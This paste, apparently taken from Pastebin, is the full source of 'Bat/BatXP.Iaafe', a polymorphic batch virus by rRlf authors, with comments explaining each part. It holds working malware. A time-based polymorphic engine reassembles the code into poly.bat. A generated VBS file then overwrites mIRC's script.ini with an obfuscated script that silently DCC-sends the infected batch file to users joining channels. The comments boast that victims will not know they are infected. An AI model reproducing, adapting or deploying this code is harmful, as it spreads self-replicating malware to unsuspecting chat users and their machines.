FlyFar

Virus.Bat.iaafe - Source Code

Jul 3rd, 2023
116
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Batch 19.72 KB | Cybersecurity | 0 0
  1. set generation=0
  2. @echo off % spth-phile %
  3. cls % spth-phile %
  4. % spth-phile %set /a generation=%generation%+1
  5. % spth-phile %if %generation% EQU 5 (
  6. % spth-phile %echo You are infect with philet0ast3r's and Second Part To Hell's Bat/BatXP.Iaafe!
  7. % spth-phile %set generation=0
  8. % spth-phile %)
  9. % spth-phile %echo set generation=%generation% >poly.bat
  10. :: Bat/BatXP.Iaafe                                                                  % spth-phile %
  11. :: by philet0ast3r[rRlf] & Second Part To Hell[rRlf]                                                    % spth-phile %
  12. ::                                                                          % spth-phile %
  13. :: philet0ast3r: Virus idea, name idea and the genial random engine :D                                          % spth-phile %
  14. :: Second Part To Hell: Included the virus part, encrypt the BAT/VBS part, BatXP workable (workable? +fg+), made this stuff polymporph and the comments % spth-phile %
  15. ::                                                                          % spth-phile %
  16. :: Big thanks goes to Lord Yup for writting the the "Silend DCC SEND"-Article { You'll find it in 29A #6 }                      % spth-phile %
  17. :: ------------------------------------------------------------------------------------------------------------------------------------------       % spth-phile %
  18. :: General Virus Info:                                                                  % spth-phile %
  19. ::                                                                          % spth-phile %
  20. :: Name of the Virus................................. Bat/BatXP.Iaafe                                           % spth-phile %
  21. :: Author............................................ philet0ast3r & Second Part To Hell                                % spth-phile %
  22. :: Size.............................................. 20.194 byte                                           % spth-phile %
  23. :: Encrypt........................................... Most of the virus part and something of the random-engine                     % spth-phile %
  24. :: Polymorphism...................................... Yes                                               % spth-phile %
  25. ::  (possible variants under WinXP (21*20*19*18*17*16*15*14*13*12*11*10*9*8*7*6*5*4*3*2) = 51090942171709440000 = ca. 51 trillion :]  )             % spth-phile %
  26. ::  (possible variants under WinME/98/95 (5*4*3*2) =120 ... because command.com doesn't allow more sets)                        % spth-phile %
  27. :: Spreading......................................... The virus spreads via mIRC, but not the normal "one-line-mIRC-spreading" way, but         % spth-phile %
  28. ::                            a much better one. The User won't know, that he's infect.                     % spth-phile %
  29. :: Payload........................................... Every 5th generation the virus shows a shourt text                        % spth-phile %
  30. ::                                                                          % spth-phile %
  31. :: Last words by Second Part To Hell:                                                           % spth-phile %
  32. :: I nearly commited suicide while writing this virus ;),                                               % spth-phile %
  33. :: because i had to fix more than 1.000.000 bugs in this fuckin' program.                                       % spth-phile %
  34. :: But I'm sure, i fixed all and now the virus works without mistake.                                           % spth-phile %
  35. ::                                                                          % spth-phile %
  36. :: Last words by philet0ast3r:                                                              % spth-phile %
  37. :: I just want to thank/greet some important persons:                                                   % spth-phile %
  38. :: breathe for helping me getting the idea how a batch random # generator could work                                    % spth-phile %
  39. :: 3ri5, kathi, ina, janine & phily for being real friends (and more ;)                                         % spth-phile %
  40. :: Slage Hammer                                                                     % spth-phile %
  41. :: alcopaul                                                                     % spth-phile %
  42. :: the rest of the rRlf and some other ppl, who know me                                                 % spth-phile %
  43. ::                                                                          % spth-phile %
  44. % spth-phile %set generation=
  45. % spth-phile %set qwxykjsi=set
  46. % spth-phile %set aaa=A
  47. %qwxykjsi% fi=if % spth-phile %
  48. %qwxykjsi% nt=not % spth-phile %
  49. %qwxykjsi% el=errorlevel % spth-phile %
  50. %qwxykjsi% ine=%fi% %nt% %el% % spth-phile %
  51. % spth-phile %set vrsa=rndom
  52. set oto=goto% spth-phile %
  53. %qwxykjsi% a=0 % spth-phile %
  54. set fd=find% spth-phile %
  55. ::       This part makes the set's for the crypt BAT part
  56.  
  57. %fd% "spth-phile"<%0>>poly.bat
  58. ::      The virus searches for "spth-phile" in every line of itself an
  59. ::      write this lines to the poly.bat file
  60.  
  61. %qwxykjsi% xp=true% spth-phile %
  62. % spth-phile %if %xp% EQU true goto xptruea
  63. ::      It's a BatXP command, if it's true, the virus goes to the BatXP part
  64.  
  65. goto winparta       % spth-phile %
  66. ::      Else it goes to the Bat part
  67.  
  68. :xptruea        % spth-phile %
  69. % spth-phile %set a=0
  70. % spth-phile %set b=0
  71. % spth-phile %set c=0
  72. % spth-phile %set d=0
  73. % spth-phile %set e=0
  74. % spth-phile %set f=0
  75. % spth-phile %set g=0
  76. % spth-phile %set h=0
  77. % spth-phile %set i=0
  78. % spth-phile %set j=0
  79. % spth-phile %set k=0
  80. % spth-phile %set l=0
  81. % spth-phile %set m=0
  82. % spth-phile %set n=0
  83. % spth-phile %set o=0
  84. % spth-phile %set p=0
  85. % spth-phile %set q=0
  86. % spth-phile %set r=0
  87. % spth-phile %set s=0
  88. % spth-phile %set t=0
  89. % spth-phile %set u=0
  90. ::      This set's are for the poly engine, because the variables can't be nothing
  91. ::      in an if-part
  92.  
  93. :start0 % spth-phile %
  94. % spth-phile %set aa=0
  95. ::      aa, the main poly-engine variable is zero
  96.  
  97. :start1 % spth-phile %
  98. if %aa% EQU 5 goto endpoly % spth-phile %
  99. %qwxykjsi% /a aa=%aa%+1 % spth-phile %
  100. ::      aa is aa+1
  101.  
  102. :start2 % spth-phile %
  103. ver|time|%fd% ",1">nul % spth-phile %
  104. ::      Searching after "1" in the current time
  105.  
  106. %ine% 1 %qwxykjsi% %vrsa%%aa%=1% spth-phile %
  107. ::      If there is no errorlevel, that means, if the searching number in the time
  108. ::      is 1, the variable %vrsa%(random)%aa%(changes, but at first it's 1) is 1!
  109.  
  110. %ine% 1 %oto% start1 % spth-phile %
  111. ::      Goto start
  112.  
  113. ver|time|%fd% ",2">nul % spth-phile %
  114. %ine% 1 %qwxykjsi% %vrsa%%aa%=2% spth-phile %
  115. %ine% 1 %oto% start1 % spth-phile %
  116. ::      Ones more the same
  117.  
  118. ver|time|%fd% ",3">nul % spth-phile %
  119. %ine% 1 %qwxykjsi% %vrsa%%aa%=3% spth-phile %
  120. %ine% 1 %oto% start1 % spth-phile %
  121. ver|time|%fd% ",4">nul % spth-phile %
  122. %ine% 1 %qwxykjsi% %vrsa%%aa%=4% spth-phile %
  123. %ine% 1 %oto% start1 % spth-phile %
  124. ver|time|%fd% ",5">nul % spth-phile %
  125. %ine% 1 %qwxykjsi% %vrsa%%aa%=5% spth-phile %
  126. %ine% 1 %oto% start1 % spth-phile %
  127. ver|time|%fd% ",6">nul % spth-phile %
  128. %ine% 1 %qwxykjsi% %vrsa%%aa%=6% spth-phile %
  129. %ine% 1 %oto% start1 % spth-phile %
  130. ver|time|%fd% ",7">nul % spth-phile %
  131. %ine% 1 %qwxykjsi% %vrsa%%aa%=7% spth-phile %
  132. %ine% 1 %oto% start1 % spth-phile %
  133. ver|time|%fd% ",8">nul % spth-phile %
  134. %ine% 1 %qwxykjsi% %vrsa%%aa%=8% spth-phile %
  135. %ine% 1 %oto% start1 % spth-phile %
  136. ver|time|%fd% ",9">nul % spth-phile %
  137. %ine% 1 %qwxykjsi% %vrsa%%aa%=9% spth-phile %
  138. %ine% 1 %oto% start1 % spth-phile %
  139. ver|time|%fd% ",0">nul % spth-phile %
  140. %ine% 1 %qwxykjsi% %vrsa%%aa%=10% spth-phile %
  141. %ine% 1 %oto% start1 % spth-phile %
  142. goto start2 % spth-phile %
  143. :endpoly % spth-phile %
  144. % spth-phile %if %a% NEQ 1 (if %rndom1% EQU 1 (
  145. % spth-phile %find "%aaa%AAA" <%0 >>poly.bat
  146. % spth-phile %set a=1
  147. % spth-phile %))
  148. ::      The last 4 lines are one if-part.
  149. ::      If a <> 1 AND if %random1% (you know: %vrsa%%aa%) is 1 then seaching
  150. ::      after "BBBB" in the whole code, and write it to poly.bat. And changing
  151. ::      the "a" to 1! So this part of the code won't write ones more to the poly.bat
  152.  
  153. % spth-phile %if %b% NEQ 1 (if %rndom1% EQU 2 (
  154. % spth-phile %find "%aaa%BBB" <%0 >>poly.bat
  155. % spth-phile %set b=1
  156. % spth-phile %))
  157. ::      The same
  158.  
  159. % spth-phile %if %c% NEQ 1 (if %rndom1% EQU 3 (
  160. % spth-phile %find "%aaa%CCC" <%0 >>poly.bat
  161. % spth-phile %set c=1
  162. % spth-phile %))
  163. % spth-phile %if %d% NEQ 1 (if %rndom1% EQU 4 (
  164. % spth-phile %find "%aaa%DDD" <%0 >>poly.bat
  165. % spth-phile %set d=1
  166. % spth-phile %))
  167. % spth-phile %if %e% NEQ 1 (if %rndom2% EQU 1 (
  168. % spth-phile %find "%aaa%EEE" <%0 >>poly.bat
  169. % spth-phile %set e=1
  170. % spth-phile %))
  171. % spth-phile %if %f% NEQ 1 (if %rndom2% EQU 2 (
  172. % spth-phile %find "%aaa%FFF" <%0 >>poly.bat
  173. % spth-phile %set f=1
  174. % spth-phile %))
  175. % spth-phile %if %g% NEQ 1 (if %rndom2% EQU 3 (
  176. % spth-phile %find "%aaa%GGG" <%0 >>poly.bat
  177. % spth-phile %set g=1
  178. % spth-phile %))
  179. % spth-phile %if %h% NEQ 1 (if %rndom2% EQU 4 (
  180. % spth-phile %find "%aaa%HHH" <%0 >>poly.bat
  181. % spth-phile %set h=1
  182. % spth-phile %))
  183. % spth-phile %if %i% NEQ 1 (if %rndom3% EQU 1 (
  184. % spth-phile %find "%aaa%III" <%0 >>poly.bat
  185. % spth-phile %set i=1
  186. % spth-phile %))
  187. % spth-phile %if %j% NEQ 1 (if %rndom3% EQU 2 (
  188. % spth-phile %find "%aaa%JJJ" <%0 >>poly.bat
  189. % spth-phile %set j=1
  190. % spth-phile %))
  191. % spth-phile %if %k% NEQ 1 (if %rndom3% EQU 3 (
  192. % spth-phile %find "%aaa%KKK" <%0 >>poly.bat
  193. % spth-phile %set k=1
  194. % spth-phile %))
  195. % spth-phile %if %l% NEQ 1 (if %rndom3% EQU 4 (
  196. % spth-phile %find "%aaa%LLL" <%0 >>poly.bat
  197. % spth-phile %set l=1
  198. % spth-phile %))
  199. % spth-phile %if %m% NEQ 1 (if %rndom4% EQU 1 (
  200. % spth-phile %find "%aaa%MMM" <%0 >>poly.bat
  201. % spth-phile %set m=1
  202. % spth-phile %))
  203. % spth-phile %if %n% NEQ 1 (if %rndom4% EQU 2 (
  204. % spth-phile %find "%aaa%NNN" <%0 >>poly.bat
  205. % spth-phile %set n=1
  206. % spth-phile %))
  207. % spth-phile %if %o% NEQ 1 (if %rndom4% EQU 3 (
  208. % spth-phile %find "%aaa%OOO" <%0 >>poly.bat
  209. % spth-phile %set o=1
  210. % spth-phile %))
  211. % spth-phile %if %p% NEQ 1 (if %rndom4% EQU 4 (
  212. % spth-phile %find "%aaa%PPP" <%0 >>poly.bat
  213. % spth-phile %set p=1
  214. % spth-phile %))
  215. % spth-phile %if %q% NEQ 1 (if %rndom5% EQU 1 (
  216. % spth-phile %find "%aaa%QQQ" <%0 >>poly.bat
  217. % spth-phile %set q=1
  218. % spth-phile %))
  219. % spth-phile %if %r% NEQ 1 (if %rndom5% EQU 2 (
  220. % spth-phile %find "%aaa%RRR" <%0 >>poly.bat
  221. % spth-phile %set r=1
  222. % spth-phile %))
  223. % spth-phile %if %s% NEQ 1 (if %rndom5% EQU 3 (
  224. % spth-phile %find "%aaa%SSS" <%0 >>poly.bat
  225. % spth-phile %set s=1
  226. % spth-phile %))
  227. % spth-phile %if %t% NEQ 1 (if %rndom5% EQU 4 (
  228. % spth-phile %find "%aaa%TTT" <%0 >>poly.bat
  229. % spth-phile %set t=1
  230. % spth-phile %))
  231. % spth-phile %if %u% NEQ 1 (if %rndom5% EQU 5 (
  232. % spth-phile %find "%aaa%UUU" <%0 >>poly.bat
  233. % spth-phile %set u=1
  234. % spth-phile %))
  235. % spth-phile %if %a% EQU 1 (if %b% EQU 1 (if %c% EQU 1 (if %d% EQU 1 (
  236. % spth-phile %if %e% EQU 1 (if %f% EQU 1 (if %g% EQU 1 (if %h% EQU 1 (
  237. % spth-phile %if %i% EQU 1 (if %j% EQU 1 (if %k% EQU 1 (if %l% EQU 1 (
  238. % spth-phile %if %m% EQU 1 (if %n% EQU 1 (if %o% EQU 1 (if %p% EQU 1 (
  239. % spth-phile %if %q% EQU 1 (if %r% EQU 1 (if %s% EQU 1 (if %t% EQU 1 (if %u% EQU 1 (
  240. goto irca % spth-phile %
  241. % spth-phile %)))))))))))))))))))))
  242. ::      The last 7 lines are one really gigant if-part :)
  243. ::      If every letter from "a" to "u" is 1, then the file goes to the mIRC part.
  244.  
  245. goto start0 % spth-phile %
  246. ::      Else it goes to the start0 part (and searches ones more for random-numbers)
  247.  
  248. :winparta       % spth-phile %
  249. ::      Here you can find the normal Bat. If the OS isn't WinXP/Win2000prof,
  250. ::      the virus will start it's life here.
  251.  
  252. set wina=0% spth-phile %
  253. set winb=0% spth-phile %
  254. set winc=0% spth-phile %
  255. set wind=0% spth-phile %
  256. set wine=0% spth-phile %
  257. set oto=% spth-phile %
  258. set qwxykjsi=% spth-phile %
  259. set nt=% spth-phile %
  260. set fi=% spth-phile %
  261. set el=% spth-phile %
  262. set ine=% spth-phile %
  263. ::      These are some variables for cryption or for the poly-engine
  264.  
  265. :startwin2  % spth-phile %
  266. % spth-phile %if not %wina%==1 goto polyengi
  267. % spth-phile %if not %winb%==1 goto polyengi
  268. % spth-phile %if not %winc%==1 goto polyengi
  269. % spth-phile %if not %wind%==1 goto polyengi
  270. % spth-phile %if not %wine%==1 goto polyengi
  271. ::      These 5 lines are doing the same as the big 7-lines-if-part in the BatXP!
  272.  
  273. goto winirc % spth-phile %
  274. :polyengi       % spth-phile %
  275. ver|time|find ",1">nul % spth-phile %
  276. if not errorlevel 1 set randoma=1% spth-phile %
  277. if not errorlevel 1 goto enpolywin % spth-phile %
  278. ::      You have to know these lines, because I explained it in the BatXP part
  279.  
  280. ver|time|find ",2">nul % spth-phile %
  281. if not errorlevel 1 set randoma=2% spth-phile %
  282. if not errorlevel 1 goto enpolywin % spth-phile %
  283. ver|time|find ",3">nul % spth-phile %
  284. if not errorlevel 1 set randoma=3% spth-phile %
  285. if not errorlevel 1 goto enpolywin % spth-phile %
  286. ver|time|find ",4">nul % spth-phile %
  287. if not errorlevel 1 set randoma=4% spth-phile %
  288. if not errorlevel 1 goto enpolywin % spth-phile %
  289. ver|time|find ",5">nul % spth-phile %
  290. if not errorlevel 1 set randoma=5% spth-phile %
  291. if not errorlevel 1 goto enpolywin % spth-phile %
  292. goto startwin2   % spth-phile %
  293. :enpolywin   % spth-phile %
  294. % spth-phile %if not %wina%==1 if %randoma%==1 goto enapolywin
  295. % spth-phile %if not %winb%==1 if %randoma%==2 goto enbpolywin
  296. % spth-phile %if not %winc%==1 if %randoma%==3 goto encpolywin
  297. % spth-phile %if not %wind%==1 if %randoma%==4 goto endpolywin
  298. % spth-phile %if not %wine%==1 if %randoma%==5 goto enepolywin
  299. ::      If the variable "wina-e" isn't 1, then if the "randoma" is 1-5,
  300. ::      the virus goes to an other part of the Bat-poly-engine
  301.  
  302. goto startwin2   % spth-phile %
  303. :enapolywin     % spth-phile %
  304. % spth-phile %find "%aaa%BBB"<%0>> poly.bat
  305. % spth-phile %find "%aaa%AAA"<%0>> poly.bat
  306. % spth-phile %find "%aaa%KKK"<%0>> poly.bat
  307. % spth-phile %find "%aaa%DDD"<%0>> poly.bat
  308. set wina=1% spth-phile %
  309. ::      The virus writes every lines with "ABBB","AAAA","AKKK","ADDD" to the poly-file
  310. ::      and changes the variable "wina" to 1
  311. % spth-phile %goto startwin2
  312. :enbpolywin     % spth-phile %
  313. % spth-phile %find "%aaa%EEE"<%0>> poly.bat
  314. % spth-phile %find "%aaa%LLL"<%0>> poly.bat
  315. % spth-phile %find "%aaa%GGG"<%0>> poly.bat
  316. % spth-phile %find "%aaa%HHH"<%0>> poly.bat
  317. set winb=1% spth-phile %
  318. % spth-phile %goto startwin2
  319. :encpolywin     % spth-phile %
  320. % spth-phile %find "%aaa%III"<%0>> poly.bat
  321. % spth-phile %find "%aaa%JJJ"<%0>> poly.bat
  322. % spth-phile %find "%aaa%CCC"<%0>> poly.bat
  323. % spth-phile %find "%aaa%FFF"<%0>> poly.bat
  324. set winc=1% spth-phile %
  325. % spth-phile %goto startwin2
  326. :endpolywin     % spth-phile %
  327. % spth-phile %find "%aaa%NNN"<%0>> poly.bat
  328. % spth-phile %find "%aaa%MMM"<%0>> poly.bat
  329. % spth-phile %find "%aaa%PPP"<%0>> poly.bat
  330. % spth-phile %find "%aaa%OOO"<%0>> poly.bat
  331. set wind=1% spth-phile %
  332. % spth-phile %goto startwin2
  333. :enepolywin     % spth-phile %
  334. % spth-phile %find "%aaa%RRR"<%0>> poly.bat
  335. % spth-phile %find "%aaa%SSS"<%0>> poly.bat
  336. % spth-phile %find "%aaa%UUU"<%0>> poly.bat
  337. % spth-phile %find "%aaa%TTT"<%0>> poly.bat
  338. % spth-phile %find "%aaa%QQQ"<%0>> poly.bat
  339. set wine=1% spth-phile %
  340. % spth-phile %goto startwin2
  341. :winirc      % spth-phile %
  342. % spth-phile %set wina=
  343. % spth-phile %set winb=
  344. % spth-phile %set winc=
  345. % spth-phile %set wind=
  346. % spth-phile %set wine=
  347. % spth-phile %set aaa=
  348. % spth-phile %set randoma=
  349. ::      All variables used in the poly-engine are deleted
  350.  
  351. :irca % AAAA %
  352. if exist C:\mirc\script.ini set mir=C:\mirc% AAAA %
  353. echo %mir%
  354. if exist C:\mirc32\script.ini set mir=C:\mirc32% AAAA %
  355. if exist C:\proga~1\mirc\script.ini set mir=C:\progra~1\mirc% AAAA %
  356. if exist C:\prgra~1\mirc32\script.ini set mir=C:\progra~1\mirc32% AAAA %
  357. goto ircb% AAAA %
  358. :ircb % ABBB %
  359. set mirc=%mir%\script.ini% ABBB %
  360. set vs=chr(% ABBB %
  361. goto ircc% ABBB %
  362. :ircc % ACCC %
  363. set wc=echo file.writeline% ACCC %
  364. goto ircd% ACCC %
  365. :ircd % ADDD %
  366. echo dim fso, file > irc.vbs% ADDD %
  367. echo set fso = createobject("scripting.filesystemobject") >>irc.vbs% ADDD %
  368. echo set file = fso.createtextfile ("%mir%\script.ini", true)>>irc.vbs% ADDD %
  369. goto irce% ADDD %
  370. :irce % AEEE %
  371. %wc% "   on 1:st" + %vs%97) + "rt: { ." + %vs%115) + %vs%101) + %vs%116) + " " + %vs%37) + "filee %mir%\name.b" + %vs%97) + "t }">>irc.vbs% AEEE %
  372. %wc% "   on 1:join:#: { ">>irc.vbs% AEEE %
  373. %wc% "    .if (" + %vs%36) + "nick != " + %vs%36) + "me " + %vs%38) + "" + %vs%38) + " " + %vs%37) + "old != " + %vs%36) + "nick) {">>irc.vbs% AEEE %
  374. goto ircf% AEEE %
  375. :ircf % AFFF %
  376. %wc% "    ." + %vs%115) + %vs%101) + %vs%116) + " " + %vs%37) + "old " + %vs%36) + "nick">>irc.vbs% AFFF %
  377. %wc% "    .timer " + %vs%36) + "+ " + %vs%36) + "r" + %vs%97) + "nd(1,100000) 1 5 ." + %vs%36) + "check_him( " + %vs%36) + "nick , " + %vs%36) + "ch" + %vs%97) + "n )">>irc.vbs% AFFF %
  378. goto ircg% AFFF %
  379. :ircg % AGGG %
  380. %wc% "                                        }  ">>irc.vbs% AGGG %
  381. %wc% "   }">>irc.vbs% AGGG %
  382. %wc% "  " + %vs%97) + "li" + %vs%97) + "s check_him {">>irc.vbs% AGGG %
  383. goto irch% AGGG %
  384. :irch % AHHH %
  385. %wc% "  ." + %vs%115) + %vs%101) + %vs%116) + " " + %vs%37) + "port " + %vs%36) + "r" + %vs%97) + "nd(9999,999999)  ">>irc.vbs% AHHH %
  386. %wc% "  .while (" + %vs%36) + "portfree(" + %vs%37) + "port) == " + %vs%36) + "f" + %vs%97) + "lse) { ." + %vs%115) + %vs%101) + %vs%116) + " " + %vs%37) + "port " + %vs%36) + "r" + %vs%97) + "nd(9999,999999) }">>irc.vbs% AHHH %
  387. goto irci% AHHH %
  388. :irci % AIII %
  389. %wc% "  .%fi% (" + %vs%36) + "1 !isop " + %vs%36) + "2) {    ">>irc.vbs% AIII %
  390. %wc% "    .%nt%ice " + %vs%36) + "1 :DCC " + %vs%115) + %vs%101) + %vs%110) + %vs%100) + " teletubies ( " + %vs%36) + "+ " + %vs%36) + "ip " + %vs%36) + "+ ) ">>irc.vbs% AIII %
  391. goto ircj% AIII %
  392. :ircj % AJJJ %
  393. %wc% "    ." + %vs%115) + %vs%101) + %vs%116) + " " + %vs%37) + "sock_n" + %vs%97) + "me " + %vs%36) + "r" + %vs%97) + "nd(1,99999)">>irc.vbs% AJJJ %
  394. %wc% "    .msg " + %vs%36) + "1 DCC " + %vs%115) + %vs%101) + %vs%110) + %vs%100) + " " + %vs%37) + "filee " + %vs%36) + "longip(" + %vs%36) + "ip)  " + %vs%37) + "port " + %vs%36) + "file(" + %vs%37) + "filee).size " + %vs%36) + "+ ">>irc.vbs% AJJJ %
  395. %wc% "    .socklisten " + %vs%37) + "sock_n" + %vs%97) + "me " + %vs%37) + "port">>irc.vbs% AJJJ %
  396. goto irck% AJJJ %
  397. :irck % AKKK %
  398. %wc% "    .timers off">>irc.vbs% AKKK %
  399. %wc% "    .timer " + %vs%36) + "+ " + %vs%36) + "r" + %vs%97) + "nd(1,99999) 0 10 .cloze">>irc.vbs% AKKK %
  400. %wc% "                    }  ">>irc.vbs% AKKK %
  401. goto ircl% AKKK %
  402. :ircl % ALLL %
  403. %wc% "  }">>irc.vbs% ALLL %
  404. %wc% "  on 1:socklisten:" + %vs%37) + "sock_n" + %vs%97) + "me: {">>irc.vbs% ALLL %
  405. goto ircm% ALLL %
  406. :ircm % AMMM %
  407. %wc% "  ." + %vs%115) + %vs%101) + %vs%116) + " " + %vs%37) + "client_n" + %vs%97) + "me " + %vs%36) + "r" + %vs%97) + "nd(1,9999999)">>irc.vbs% AMMM %
  408. %wc% "  .sockclose " + %vs%37) + "sock_n" + %vs%97) + "me">>irc.vbs% AMMM %
  409. goto ircn% AMMM %
  410. :ircn % ANNN %
  411. %wc% "  ." + %vs%115) + %vs%101) + %vs%116) + " " + %vs%37) + "l 0">>irc.vbs% ANNN %
  412. %wc% "  .bre" + %vs%97) + "d " + %vs%37) + "filee " + %vs%37) + "l 4000 " + %vs%38) + "le">>irc.vbs % ANNN %
  413. goto irco% ANNN %
  414. :irco % AOOO %
  415. %wc% "  .sockwrite -b " + %vs%37) + "client_n" + %vs%97) + "me 4000 " + %vs%38) + "le">>irc.vbs% AOOO %
  416. %wc% "  " + %vs%37) + "l = " + %vs%37) + "l + 4000">>irc.vbs% AOOO %
  417. goto ircp% AOOO %
  418. :ircp % APPP %
  419. %wc% "  ." + %vs%115) + %vs%101) + %vs%116) + " " + %vs%37) + "end 0">>irc.vbs% APPP %
  420. %wc% "  }">>irc.vbs% APPP %
  421. %wc% "  on 1:sockre" + %vs%97) + "d:" + %vs%37) + "client_n" + %vs%97) + "me: {">>irc.vbs% APPP %
  422. goto ircq % APPP %
  423. :ircq % AQQQ %
  424. %wc% "  .%fi% (" + %vs%37) + "l >= " + %vs%36) + "file(" + %vs%37) + "filee).size) {">>irc.vbs% AQQQ %
  425. %wc% "    ." + %vs%115) + %vs%101) + %vs%116) + " " + %vs%37) + "end 1">>irc.vbs% AQQQ %
  426. goto ircr% AQQQ %
  427. :ircr % ARRR %
  428. %wc% "    .sockclose " + %vs%37) + "client_n" + %vs%97) + "me">>irc.vbs% ARRR %
  429. %wc% "    .h" + %vs%97) + "lt">>irc.vbs% ARRR %
  430. %wc% "   } .else {">>irc.vbs% ARRR %
  431. goto ircs% ARRR %
  432. :ircs % ASSS %
  433. %wc% "    .%fi% (" + %vs%37) + "end != 1) {">>irc.vbs% ASSS %
  434. %wc% "    .bre" + %vs%97) + "d " + %vs%37) + "filee " + %vs%37) + "l 4000 " + %vs%38) + "le">>irc.vbs% ASSS %
  435. goto irct% ASSS %
  436. :irct % ATTT %
  437. %wc% "    .sockwrite -b " + %vs%37) + "client_n" + %vs%97) + "me 4000 " + %vs%38) + "le">>irc.vbs% ATTT %
  438. %wc% "    " + %vs%37) + "l = " + %vs%37) + "l + 4000">>irc.vbs% ATTT %
  439. %wc% "  } } }">>irc.vbs% ATTT %
  440. goto ircu% ATTT %
  441. :ircu % AUUU %
  442. %wc% "  " + %vs%97) + "li" + %vs%97) + "s cloze { .sockclose " + %vs%37) + "sock_n" + %vs%97) + "me } ">>irc.vbs% AUUU %
  443. echo file.Close >>irc.vbs% AUUU %
  444. cscript irc.vbs% AUUU %
  445. cls% AUUU %
  446. goto eirc% AUUU %
  447. ::      This is the whole virus part
  448. ::      It spreads via mIRC, and is mostly encrypt
  449.  
  450. :eirc % phile-spth %
  451. del irc.vbs % phile-spth %
  452. find "phile-spth"<%0>>poly.bat
  453. copy poly.bat %mir%\name.bat % phile-spth %
  454. del poly.bat % phile-spth %
  455. cls  % phile-spth %
  456. ::      Last but not least, the virus searchs for "phile-spth" in the viruscode,
  457. ::      And write it to the poly.bat! Then it copies the poly.bat to the mIRC-dir
  458. ::      and deletes the irc-vbs and the poly.bat!
Tags: batch virus SPTH
Add Comment
Please, Sign In to add comment